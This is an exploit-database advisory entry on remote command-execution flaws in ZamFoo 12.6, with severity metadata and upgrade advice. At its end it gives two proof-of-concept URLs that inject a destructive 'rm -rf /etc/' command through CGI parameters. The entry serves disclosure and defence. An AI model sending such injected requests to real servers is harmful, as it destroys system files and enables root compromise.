header-logo
Suggest Exploit
vendor:
ZamFoo
by:
SecurityFocus
9,3
CVSS
HIGH
Remote Command-Execution
78
CWE
Product Name: ZamFoo
Affected Version From: 12.6
Affected Version To: 12.6
Patch Exists: Yes
Related CWE: N/A
CPE: a:zamfoo:zamfoo
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

ZamFoo Multiple Remote Command-Execution Vulnerabilities

ZamFoo is prone to multiple remote command-execution vulnerabilities. Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.

Mitigation:

Upgrade to the latest version of ZamFoo.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/67215/info

ZamFoo is prone to multiple remote command-execution vulnerabilities.

Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.

ZamFoo 12.6 is vulnerable; other versions may also be affected. 

https://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS}

https://www.example.com/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf /etc/|&newip=127.0.0.1&pattern2=